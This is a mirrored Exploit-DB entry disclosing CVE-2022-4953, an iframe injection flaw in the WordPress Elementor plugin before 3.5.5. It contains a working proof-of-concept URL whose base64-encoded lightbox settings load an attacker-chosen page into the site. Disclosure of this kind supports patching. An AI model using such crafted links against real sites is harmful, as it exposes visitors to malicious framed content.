WordPress Plugin Elementor 3.5.5 – Iframe Injection

Exploit Database
16 阅读

作者： Miguel Santareno

日期： 2023-09-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/51716/

# Exploit Title: WordPress Plugin Elementor < 3.5.5 - Iframe Injection
# Date: 28.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://elementor.com/
# Version: < 3.5.5
# Tested on: Google and Firefox latest version
# CVE : CVE-2022-4953

# 1. Description
The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.


# 2. Proof of Concept (PoC)
Proof of Concept:
https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K

last Exploits
WordPress Plugin Elementor 3.5.5 – Iframe Injection的更多信息

PrestaShop 1.4.4.1 – ‘/modules/mondialrelay/googlemap.php’ Multiple Cross-Site Scripting Vulnerabilities：
Traidnt Up 3.0 – SQL Injection：
CosmoQuest – Authentication Bypass：
Easyndexer 1.0 – Cross-Site Request Forgery (Add Admin)：
Xeams 4.5 Build 5755 – Multiple Vulnerabilities：
Inout EasyRooms – SQL Injection：
Feng Office 3.7.0.5 – Remote Command Execution (Metasploit)：
LimeSurvey 4.3.10 – ‘Survey Menu’ Persistent Cross-Site Scripting：